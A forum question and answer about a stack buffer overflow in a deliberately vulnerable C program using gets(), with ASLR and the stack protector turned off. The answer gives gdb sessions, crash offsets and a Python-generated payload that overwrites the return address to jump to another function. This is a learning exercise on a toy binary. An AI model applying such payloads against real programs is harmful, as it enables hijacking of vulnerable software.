ROP faild on linux even when ASLR and stack compiler protector are disabled
Question
I tern off the ASLR and tern of the gcc stack protector.
And I wrote C vulnerable code and I tried to overflow the buffer so I check how many character need for the crash. And I tried to change the return address , to another function but I got a message:
Segmentation fault (core dumped)
This is my C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void sss()
{
printf("good by");
}
void scriptpy(){
printf("hello world\n");
}
int main(int argc , char** argv)
{
char buf[4];
gets(buf);
return 0;
}
I found the address of the "sss" function and i tried to insert the hex value .
This is my address:
(gdb) disas sss
Dump of assembler code for function sss:
0x00000000000006ca <+0>: push %rbp
To edit the return address i insert:
printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial
1 answers
solution1
3 2020-11-02 12:52:44
Let's suppose that the binary is compiled with the flag -fno-stack-protector and the ASLR is disabled echo 0 | sudo tee /proc/sys/kernel/randomize_va_space echo 0 | sudo tee /proc/sys/kernel/randomize_va_space .
Find the crash:
The program start crashing with payload of 12 characters:
$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)
Controlling RIP
Using GDB to find the offset that overwrite RIP, we can find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:
$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
Note that RIP is overwritten with 0041 where 00 is the null characters terminating the string.
To control all bytes of RIP:
(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
Let's suppose that the function sss is located at the address 0x0000555555555189 .
The final payload is:
(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()
Where 11 = 18 - (len('\\x89\\x51\\x55\\x55\\x55\\x55') + 1)
+1 for the null byte
The jump to the function sss is taken. The program will crash after the jump to the function sss as the stack will be corrupted.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.